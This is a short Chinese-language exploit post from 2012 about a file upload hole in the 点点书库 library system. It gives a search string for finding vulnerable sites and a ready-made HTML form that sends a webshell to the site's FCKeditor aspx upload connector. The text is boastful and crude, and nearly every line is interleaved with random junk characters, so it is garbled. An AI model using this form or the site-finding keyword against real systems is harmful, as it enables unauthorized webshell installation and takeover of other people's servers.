主题:图书馆系统任意文件上传漏洞; E8 b( g/ m" H/ m* G8 l8 `% u
作者:冰锋刺客
) O) {. p: N% N 厂商:点击书(dianjishu.com)4 V [0 R2 n' b* q
日期:2012-6-21' O" _1 C; I$ X( ?# F2 Z7 z& A
% [/ U( U3 l4 dI 概述
: P7 P1 M/ w& h% ?4 y 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell
9 h+ r8 O& M; h- K; H II 简介
. r) w, y4 }$ H* S/ c1 F 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
& _' {$ ?$ M2 Z# `5 k1 d) U/ ]) R 补充一个漏洞9 Q! ~; J$ A d# ^. b
<form id="frmUpload" enctype="multipart/form-data"
4 v' ^$ H! {% p" u! R action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>& t3 k* f: `- S/ e; s; m1 O( C
<input id="btnUpload" type="submit" value="操翻他">
. F2 J) b1 R! L' | </form>
) ~' a, A+ i, k# k- o- \+ l; }, D 你们懂的
; v s. ]: I7 L4 ]0 X$ Q 那傻逼提供还需要改包.0 O& n. i6 Z$ M5 h2 p3 |+ H/ W5 L2 t
自己看了下源代码发现fckeditor
z2 K& J) o8 \; l 直接秒杀
h5 b; I# d$ X |